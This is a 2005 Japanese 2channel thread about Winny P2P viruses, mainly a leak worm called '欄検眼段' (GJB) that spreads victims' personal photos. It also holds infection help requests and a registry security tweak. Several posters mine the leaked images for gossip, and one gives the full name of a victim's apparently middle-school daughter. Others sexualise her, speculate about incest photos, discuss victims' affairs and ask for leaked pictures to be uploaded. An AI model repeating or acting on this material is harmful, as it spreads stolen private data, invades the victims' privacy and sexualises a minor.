欄検眼段については、ずいぶん前から流れてるんだが、それらしきワーム本体が今のところ未確認なんだよ。 ただ、自作自演でないのは明らかだし、トリップが固定されてるところからも nyを狙ったものだとは分かるのだが 以前、解析を試みた 偽造解除.xxx は、すでに先生がTrojan Horseとして識別済み まだ懲りないの?.xxx は、未識別。これやも知れん。 >880 感染者が気付かないという点では、巧妙になってるので、それなりに怖いけどな 今のとこ JPEG → GJB にして流すだけだが、ユーザー名とフォルダ階層はばれる ほかに 何をしてるか 判明してない
ファイル名からおおよその住所や名前写真ばら撒かれてる人とかいるな。 かわいそうに。
欄検眼段のおすすめファイルを教えて君
884 :
[名無し]さん(bin+cue).rar :05/03/13 11:52:21 ID:/yG7ol8Q0
【使用OS】WindowsXP 【WindowsUpdateしてるか】していません 【使用AntiVirusソフト】NOD32 【AntiVirusをUpdateしてるか】毎日チェック 【ウイルススキャンの結果】あるはずのないファイルが NOD32スキャン(ウイルス警告)表示される 落とした動画を見ていると良くWindows Media Playerが固まる タスクマネージャー→タスク→WMPのタスク終了をしないと起動しない 【オンラインスキャンしたなら結果】 あるはずのないファイルが NOD32スキャンで表示される 【Winnyのバージョン】v2,0 b7.1 【Winny歴、総DL量】8ヶ月くらい 【テンプレを読んだか】読みました 【テンプレにある対策を実行したか】どの対策が良いかわからない 【症状、具体的に分かる限りすべて書く】Winny2MemPatchを試しに使ったのが原因かも あるはずのないファイルはウイルス? 最近Zone Labs Securityに頻繁にポートスキャン警告が 00.000.000 (port 000)からのアクセスを遮断と良くでる 【これまでにとった措置】UPフォルダ&アップTXTファイルを消去、毎日スキャン、Zone Labs Security PROを購入、重要ファイルを外付けHDDに移動、winny使用停止、開放ポート閉
その「あるはずのないファイル」ってのは検出されたファイルのパスが存在しないって事?
886 :
[名無し]さん(bin+cue).rar :05/03/13 12:04:39 ID:UiZutvsw0
>>885 そうです、調べていてウイルスが作ったファイルのキーワード(素人)などが
含まれているのですが、このファイルに個人情報は含まれますか?
池沼の書き込みです、皆さん苦笑してやってください。 ↓
欄検眼段_D__デジカメ_EZTOUCH_MIYOKO_〇秘_ 欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_雑_ このシリーズは・・・
>>884 Winny2MemPatchにはメール砲仕込まれてるVer.もあるからな。アウト。
あるはずのないファイルをどうやって検出するのかと小一時間。
欄検眼段の本体探しのために、ダミーPC起動を決意。そのうち地引きに
ネタが繋るかも…。
湯沢雄勝合併協議会が晒されてるな
一番最初にGO BACK落とせば良いのに。
失礼クラックスレ。
ポッポー (´ \ | __________/ヽ / .l l \| | !ノートン先生 ! //U ヽ___/ パソコン蛾人 \ !!大激怒!! // U :::U: ぶっ壊れ(__) \ !!!!! / // ___ \ ::: たお! (__) \∧∧∧∧/ | | | U :::: (`Д´#) < ぶ パ > |U | | ::U: _| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....:::: /旦|――||// /| < 壊 コ > ヽ .....::::::::: ─────────< れ ン >────────── < _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬ (y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___ ⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\ うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || | ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/ ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
>>891 そしてそのGo BackにWhiterやbatウイルスが仕込まれている現実。
システム復旧系のアプリは、ほとんど細工されてると思って間違いない。
896 :
[名無し]さん(bin+cue).rar :05/03/13 18:14:57 ID:zPz+gJdn0
テンプレに XMLのOBJECT要素によってコマンドを起動するバグ対策に、 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を 10進数で1に変更する。 と、書いてあるのですが やり方がわかりません・・・ どなたか教えて頂けないでしょうか?
ageてしまってすみませんでした
898 :
896 :05/03/13 18:21:26 ID:zPz+gJdn0
896ですが自己解決しました ご迷惑おかけしました
つーかよくメ・・・いやなんでも。
>>892-893 本家というか最初のオリジナルには、確かに何も仕込まれてないが
それ以降のものは、府警アドレスが仕込まれてるのだが…
(ガセと信じたい気持ちも分かるが、ヘンなもんに手を出すのは寄席)
さっさとシマンテックに提出しろクズ
昨日の夜ny落として一時間ほどで「キャッシュが不足しています」って出て、 落とせなくなったんで切ったら何回電源入れても「何とか is missiing」って出てウィンドウズが起動しなくなっちゃった・・ 結局再インストしたんだけど、これってウィルスだったのかな
アホばっか
実行したら「捏造です、ついでにウィルスいれときますね( ´,_ゝ`)プッ」みたいなダイアログの出る exe踏んでしまったんですが、既出だとは思うのですが、どういう内容とか調べられるところは ないでしょうか? 一応色々見てみたのですが自信がなくて・・・。
>>906 括弧内の文を見る限りVB厨な感じがする。
しかもダイアログ出して喜んでそうなタイプに思える。
>>906 自信がなければクリーンインスコ
それがニュイルススレクォリティ
嫌なら窓から(ry
>>908 Hなの?
欄検眼段ってデジカメそのまんまの画像が多いから、フォトショップなんかの
画像用アプリに本体が紛れ込んでるのかな?
911 :
906 :05/03/13 22:10:01 ID:A9wDglGu0
とりあえず実行前、後ともにノートン先生は反応なし、プロセスも変わったところはない…と思う。 気休めにシステムの復元しておきましたがイタズラのような気がします。 何かあったらまた報告に来ます。ありがとう。
>>910 もしかしてオリジナルエロ画像?って感じ。
>>912 拾え始めたが、そうみたいだね。グッジョブ!!
ちらっと一枚うpしてみてよ
このひでさん、中3の娘さんがいて、家族旅行とかも行ってるんだけど 複数の女の人と浮気してるっぽい。援助交際かも。 オレがこう言うのも筋違いなんだけど、娘さんが思春期なんだから 色んな女と浮気するのはどうかと思う。
ひでさんおもしろいな。男の中の男だぜ!
娘さん素直そうな可愛らしい子なのになあ。娘さんがPCの中身を見たら傷つくから気を付けてほしい。 ひでさんの個人情報が分かったら、その辺の所をメールか電話で注意したい。笑
娘さんのセクシーショットもなかなか(;´Д`)ハァハァ
ひでさん、浮気写真と家族写真を同じレベルの階層に置いてあるっぽいけど 大丈夫なのかな?
釣りじゃないならうpってくれよ
>>920 作者がやっとかまってもらえてうれしいようです。
>>920 ここで相手にされないからって、作者必死だな。(w
素晴らしいッッ!!!! これがッッ!!!!ニュイルスクオリティッッッ!!!!
EZTOUCHも浮気してるな。奥さんは出産したばかりなのに。
jpgで判る個人情報は結局浮気ぐらいが関の山ってことか。
>>900 いや、だからそれ、NYで流れてる奴だろ?
欄検眼段の感染元ってなんなんだろ?
>>928 作者の脳内ウィルス。
朝起きたらすべては夢だったのさ、おしまい。ってネタです。
ひでさんは鈴鹿に何を見に行ったのか。小一時間問いつめたい。
ヒント・おしり
今頃、GJB=グッジョブだったのかと気付いた風呂あがり... なんでこんな拡張子にしてるのかとオモタ
個別スレで騒いでる3へ 先に踏んだ人間からアドバイスさせてもらうと、めんどくさがらずに Windowsの入れ直しを勧める。 システムの復元ができなくなったり、ゴミ箱へファイルを捨てるときに やたら時間がかかったりでWindowsのサービス自体が結構いじられ てたので、結局入れ直させざるをえなかった。
934 :
個別スレ3 :05/03/14 00:18:42 ID:bgjSXYri0
自衛隊の写真、コンパニオンと楽しそう・・・・
あれ? 数日見てないうちにGJB大人気だな。 あれだけ作者相手にして貰えなかったのに。
感染元はなんなんだろ?
娘:三好由布子
939 :
[名無し]さん(bin+cue).rar :05/03/14 02:31:05 ID:IOFU6b/40
お気に入りは、かすみんとYAYOIかな。 YAYOIって公開されてるの?チクービ写真とか。
・感染源が分からない ・トリップが同じ 実はnyで広まるウイルスではなく、 作者が何らかの手法で自動収集した画像をアップし続けているだけとか・・?
真偽は知らぬが、欄検眼段の知名度向上を工作したり、 放流された画像を見てニヤニヤしたりするだけなら、このスレ的に無益だわな 有用なのは、被害に気付いた感染者か実行ファイルを突き止めた人が 提供する情報・客観的事実だけ
スゲー て圧縮出来てる訳じゃなくて 起動→ファイル作成なんだろうけど 早速落としてみよ
19 以下、名無しにかわりましてVIPがお送りします New! 05/03/14 02:28:00 ID:/3Gmdw0M0
>>15 んーとな、とりあえず圧縮ってものはなんなのか一行で説明してやろう
AAAAAAAAAABBBBBCCC → A10B5C3 こんなかんじ
>943 なんでlzhで圧縮しなかったんだろうな?
ここの連中って笑えるな。
>>940-941 欄検眼段については依然として調査中
共通トリップだが、接続ノード(IP)を見てると、てんでバラバラ
同一作者が流し続けているブツとは考えにくい。何らかのワーム説を主張する
>>942 同意、感染者を特定にしにくいのがネック。ダミーPCで怪しげなのを踏んでは
みてるが、未だ流れた形跡なし。アプリ系に仕込まれてるとなると、落とすのは
ともかく実験目的で動かすのもリスクだしな。感染源を探すのも楽じゃない。
怪しげなexe(いかにもニュイルスだが、先生は反応しないようなブツ)を入手したら
そこらのUpロダにパスロックかけた上で開陳してくれ。俺、今ひまだし。
>>943 低レベル杉! 藻まいら THcomp --- Tower of Hanoi compress も知らんのか?
# なんなんだこれは.どんなファイルも1バイトになるぞ.
# どーなっとるんだ?
欄検眼段落としまくりんぐ おもすれーーーーーー
951 :
[名無し]さん(bin+cue).rar :05/03/14 10:12:39 ID:NKE1nbdx0
野村町消防団 欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_家_秀&幸江&ゆうこ 2003. 7.27_00015 これって娘とのハメ撮り? 足の位置を考えるとそう見える
>>951 その2分前にはPCの前でピースしてる。
953 :
[名無し]さん(bin+cue).rar :05/03/14 11:15:34 ID:lqzwOTXi0
感染したかどうすればわかるの?
このファイルおとして開いたからって 感染するわけじゃないんでしょ
とっとと答えろや!ちんぽこんドモ!
957 :
[名無し]さん(bin+cue).rar :05/03/14 12:30:58 ID:lqzwOTXi0
わからねぇヤツがエラそうにw
一枚ここにうpしてくれ
誰か必要なコーデックを勝手に取りに行ってくれるようなワーム開発しろ
GJBウイルスでわかった事はここにいる奴等は偉そうなこと言いながら 知識はほとんど無いってことだな。 サイインスコしろばっかw 頭わりーよ。
欄検眼段、全部同じトリップの奴が流してるんだが 観戦してるのこいつだけか?
ワラっていいのか?
>>961 知識のないやつに説明するのはマンドクセ
知識のあるやつはそもそもここで質問しなくても解決する
よって、必然的に「再インスコしてこい」となるわけだ
>>963 ハハハ
>>963 一人ってことないと思うんだが 感染したやつ全部同じトリであげられるんじゃねーのか?
つーか、欄検眼団って、PCに散乱したJPG画像を、手間かけることなくnyでupできる便利ツールってことで良いか?
968 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>967 PC内で忘れかけてたイイ画像が発掘できたりするからイイかもなー
普通にドライブ内.jpg検索でいいじゃん・・・・・・・・・・・
欄検眼段で確認した分では秋田の自治体PC、その他大阪と広島の自治体か工事関係者の 仕事用写真(現場記録写真)。西日本の個人のプライベートエロと公民館写真。 オレが偶々なんかもしれないが、なんか市町村レベルの地方公共団体っぽいのが多い。
972 :
[名無し]さん(bin+cue).rar :05/03/14 15:32:40 ID:4yyznytH0
ひーでひーでひーでひーでひーで!
欄検眼段ってかなりの量が流れてるね。600M程落としたけどもう秋田
欄検眼段の作者がまたスレを立ておった tmp4.2ch.net/test/read.cgi/download/1110716092/
存在しないウイルスの噂をでっち上げて、どれだけ流布できるか 実験してるグループがある、という仮説を覆す証拠マダー(チン
>>965 おまいは何様だよ(# ゚Д゚)
わからない奴にわからせるように説明しろや!
それが真に知識を持ってる奴のすることだろ!
結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション
出来ないんだろ?それともただわからないだけとか?wだったらそう言えw
>>978 つーか知識も何も実際その実行ファイルを手に入れて解析(動作確認でも良い)しないと
きちんと調べる事なんてできないだろ。未知のプログラムなんて実際に自分で見てみないと
はっきりした答えなんて言える訳がないだろ。質問するような奴が提供してくる情報なんて
不足してるだろうし何しろ正しいかどうかも分からないんだから答えようがねーだろ。
逆ギレしてる奴はよっぽど困ってるんだろうなw
あと俺は
>>965 ではないが
>わからない奴にわからせるように説明しろや!
>それが真に知識を持ってる奴のすることだろ!
何を勘違いしてるんだか知らないけどここは学校じゃないですよ?
お前らも俺も「分からない時は聞きなさい」と言われて育てられたから
そう言いたくなる気持ちは分からないでもないけど知識を持ってる人は
先生じゃないんだから教えるも教えぬも自由。
答えるまでもない質問やあまりに初歩的な質問に答える気なんか沸か
ねーよ。例えば自分が自己解決したような質問なんか答える気0って
感じだな。
知識や経験や年齢を問わずネットユーザは皆同じに1ユーザなんだよ。
まずはネットマナーでも勉強したらどうかな?w
>>978 仕事だったらやるけどな、そんな疲れる作業をする気はサラサラない。
だいぶお困りのようですね
あとここで「どうせ知識ないんだろ」なんて煽ってる奴らは 自分で解決できないからって僻まないようにしてくれよw つーかほんと自分のやってる事自体把握してなさそうな奴 ばかりじゃねーか。ただでさえブロードバンドが普及して ネットの在り方なんてそっちのけの一般ユーザがP2Pに 舞い込んできてウザかったのにネットラ●ナーみたいな 雑誌が更に引きずり込んでくれたもんだからほんと今 最悪だな。
結局は釣りなんだ 無視しようよ
次スレの季節です。
>>965 おまいは何様だよ(#゚Д゚)
わからない奴にわからせるように説明しろや!
それが真に知識を持ってる奴のすることだろ!
結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション
出来ないんだろ?それともただわからないだけとか?wだったらそう言えw
>>978 の顔文字に余計なスペースがあったので直しといた
次・ス・レ !! 次・ス・レ !!
>>987 ごめん、965じゃないけどお前の言うこと理解できない。
わかってるから面倒なんだよ。同じ事何度もそこら辺で言ってられるかっつーの。それこそ馬鹿だ。
知識を持ってる奴が「出来る事」であって「する(べき)事」ではないよ。
ここは新種のワーム&ウィルスのスレ
ウイルスを解析しようって気概のある奴はいねーのなw じゃあなんでここに来てるんだよおまえらw
何か興味深いウイルスがでてくるかもしれない。 もしくはすごいマヌケに出会えるかもしれない。
ニュイルススレなんだからニュイルスの情報があれば別に問題ないじゃん
次スレマダー? 緊急引越し先↓ [欄検眼段]新手のウイルス[GJB] tmp4.2ch.net/test/read.cgi/download/1110716092/
>>991 貴殿は解析しようって気概があるようなので、頑張って解析してくれ。
httpつけろ
知っているがお前の態度が気に入らない
ははは
999
1000
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。